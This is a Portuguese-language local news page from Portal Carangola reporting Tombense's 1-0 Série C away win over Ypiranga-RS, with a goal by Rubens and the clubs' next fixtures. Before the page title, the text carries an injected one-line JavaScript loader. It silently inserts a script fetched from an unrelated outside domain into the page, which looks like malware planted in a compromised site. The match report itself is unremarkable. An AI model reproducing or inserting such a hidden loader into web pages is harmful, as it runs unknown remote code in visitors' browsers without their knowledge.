;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Rubens decide, Tombense vence o Ypiranga-RS e sobe na tabela da Série C. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Rubens decide, Tombense vence o Ypiranga-RS e sobe na tabela da Série C.

Erechim, RS, 2 Em um duelo de tentos distintos, o Tombense soube sofrer e saiu com uma importante vitória para a sequência da Série C. Em Erechim, o Gavião Carcará visitou o Ypiranga-RS e venceu pelo placar de 1 a 0, com gol do artilheiro Rubens. Com isso, chegou à sua primeira vitória na segunda fase e largou com o pé direito rumo a Série B do Brasileiro.

DEU CARCARÁ!

Dentro dos seus domínios, o Ypiranga começou o duelo partindo para cima do Tombense e encurralar os mineiros na defesa. Nos primeiros vinte minutos de partida, os gaúchos criaram uma sequência de boas chances para abrir o placar, mas pararam no goleiro Felipe Garcia. Depois disso, a primeira etapa esfriou e terminou zerada.

Na volta dos vestiários, o panorama mudou e o duelo esfriou. Lentos, os clubes pouco criavam e raramente ameaçavam a meta um do outro. Com isso, poucos lances de perigo eram criados. Quando o empate sem gols parecia confirmado, saiu o tento da vitória do Tombense. Rubens recebeu lindo passe de Galdino e mandou para as redes, selando o placar final.

PRÓXIMOS JOGOS

Ypiranga-RS e Tombense-MG voltam a campo na próxima semana pela Série C do Campeonato Brasileiro. Ambos os clubes entrarão em campo no sábado (9). Às 17h, o Gavião Carcará reeditará duelo do Grupo A diante do Manaus-AM no Estádio Almeidão, em Tombos-MG. O Canarinho, por sua vez, visitará o Novorizontino-SP às 19h, no Estádio Jorge Ismael de Biasi, em Novo Horizonte-SP.

Fonte: futebol do interior/João Santana